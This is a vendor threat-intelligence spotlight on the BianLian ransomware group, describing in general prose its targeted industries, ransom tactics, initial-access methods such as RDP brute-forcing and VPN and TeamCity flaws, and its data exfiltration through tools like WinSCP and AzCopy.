MOXFIVE Threat Actor Spotlight - BianLian

Every month, we take a look at a current ransomware threat actor. If you would like to receive this via email each month, click below to subscribe to the MOXFIVE mailing list.

MOXFIVE recently identified a
new ransomware threat, INTERLOCK. Read our Threat Actor Alert to learn more. >>

Subscribe

BianLian

BianLian, a ransomware group that emerged in 2022, has rapidly gained notoriety for its highly targeted attacks on critical infrastructure and its use of sophisticated vulnerabilities to gain initial access. Originally employing encryption-based tactics, BianLian has since shifted its focus to data exfiltration and extortion, relying on the threat of public exposure of sensitive data to coerce organizations into paying large ransoms. This evolution in tactics has allowed BianLian to capitalize on the value of stolen data, making their attacks particularly damaging to organizations across various industries.

The group gains initial access by exploiting vulnerabilities in critical infrastructure and leveraging remote services. After infiltrating the network, BianLian moves laterally, exfiltrating large volumes of sensitive data, often transferring the data to trusted cloud services like Azure Blob Storage. Their ransom demands are tailored to the perceived value of the exfiltrated data and the financial standing of the victim, making BianLian a versatile and highly dangerous threat across multiple industries.

Key Highlights

Targeted Industries: In recent months, BianLian has successfully targeted multiple victims in the Manufacturing, Professional Services, Healthcare, Financial, and Legal sectors. These industries are particularly attractive to BianLian due to the sensitive data they possess, which increases leverage in extortion attempts​.

Ransomware Payment Demands: BianLian's ransom demands are based on their perceived value of the data exfiltrated. Their ransom notes typically include detailed information regarding the victim’s revenue, the volume of data stolen, and a description of the data itself. This information allows BianLian to tailor their demands according to what they believe the data is worth to the victim, often pressuring organizations to pay to avoid public exposure of sensitive information.

Notable Leveraged Exploits:
BianLian has recently been observed brute-forcing externally facing Remote Desktop Protocol (RDP) systems and exploiting VPN vulnerabilities in SonicWall and Fortinet products. These tactics provide them with access to critical networks and have been particularly effective in the past few months. Additionally, the group has used tools like NLBrute, a well-known RDP attack tool, to automate brute-force attempts, further enhancing their ability to gain unauthorized access to remote systems.

BianLian has also exploited vulnerabilities in TeamCity, a platform widely used for Continuous Integration and Continuous Delivery (CI/CD). CI/CD automates the process of developing, testing, and deploying software, allowing companies to release updates faster. These vulnerabilities, including authentication bypass flaws, have assisted the group in gaining initial access to critical infrastructure.

Data Exfiltration:
BianLian is known for its versatility in how it exfiltrates data, employing a wide range of methods depending on the environment. The group adapts to the tools and infrastructure available within the compromised network, making them a highly flexible and stealthy threat actor.

One notable tactic involves using tools already present in the victim's environment. For instance, if they find WinSCP installed on a server, they will leverage it to exfiltrate data instead of introducing new tools, reducing the likelihood of detection.

MOXFIVE has observed BianLian gaining access to networks through compromised Managed Service Providers (MSPs) using Remote Monitoring and Management (RMM) tools. After gaining access to the network, BianLian targets domain controllers, and file servers, to exfiltrate sensitive data. They gather data from various systems, including shared folders and SQL databases, and use the stolen information to pressure executives by directly contacting them via email and text messages.

In other instances, BianLian’s tactics have pivoted to using trusted cloud services like Azure Blob Storage to transfer stolen data quickly and discreetly. Their ability to blend exfiltration traffic with legitimate cloud activities, combined with tools like AZCopy, makes it difficult for organizations to detect and block data theft in real-time.

If you would like to know more or need assistance with incident response efforts, please contact us at 833-568-6695 or email our team at [email protected].